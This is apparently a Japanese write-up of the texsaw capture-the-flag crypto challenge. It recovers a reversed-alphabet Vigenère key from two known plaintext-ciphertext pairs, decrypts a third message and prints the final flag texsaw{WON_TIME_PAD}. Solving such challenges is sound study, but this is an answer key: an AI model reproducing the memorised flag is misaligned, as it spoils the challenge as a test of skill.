RCPZURNPAQELEPJUJZEGAMVMXWVWCTBMHKNYEEAZVXQWVKGMRVWXDLCANHLGY FLPDBSBQIGBJECHMIOZGJMQONXJANFPQYQPWIIONYKNERKHIABLJTPTAOZMDGZUTAESK KDPRMZZKNBECTGTKMKQOWXKCHMVNDOPQXUWJJLECUCLBQKKVDXJNUEYFIDAGVIUG
平文は2つあり、それぞれスペースを削除すると、以下のようになる。
OPERATIONBLUEEAGLEMOVINGTOSECTORFOURSTOPREQUESTEXTRACTIONATBLUEEAGLE AGENTSUNFLOWERCOMPROMISEDNEARHANOISTOPABORTMISSIONCOMPROMISED
文字列の長さから平文と暗号文は以下の組み合わせになっていると推測できる。
平文1 : OPERATIONBLUEEAGLEMOVINGTOSECTORFOURSTOPREQUESTEXTRACTIONATBLUEEAGLE 暗号文1: FLPDBSBQIGBJECHMIOZGJMQONXJANFPQYQPWIIONYKNERKHIABLJTPTAOZMDGZUTAESK 平文2 : AGENTSUNFLOWERCOMPROMISEDNEARHANOISTOPABORTMISSIONCOMPROMISED 暗号文2: RCPZURNPAQELEPJUJZEGAMVMXWVWCTBMHKNYEEAZVXQWVKGMRVWXDLCANHLGY
DIANA.tiffの画像を見ると、アルファベットが逆順になっているが、Vigenere暗号の対応表のようになっている。
https://www.dcode.fr/vigenere-cipherでALPHABETに以下を指定する。
ZYXWVUTSRQPONMLKJIHGFEDCBA
鍵は以下であることがわかる。
QVKLAYSBUEPOZXGFWJMRNDCHTIQVKLAYSBUEPOZXGFWJMRNDCHTIQVKLAYSBUEPOZXGF
これを元に以下を復号する。
KDPRMZZKNBECTGTKMKQOWXKCHMVNDOPQXUWJJLECUCLBQKKVDXJNUEYFIDAGVIUG
復号結果は以下の通り。
THEFLAGISWONTIMEPADWITHUNDERSCORESBETWEENWORDSWRAPPEDINTHEHEADER
この文の内容からフラグを生成する。
texsaw{WON_TIME_PAD}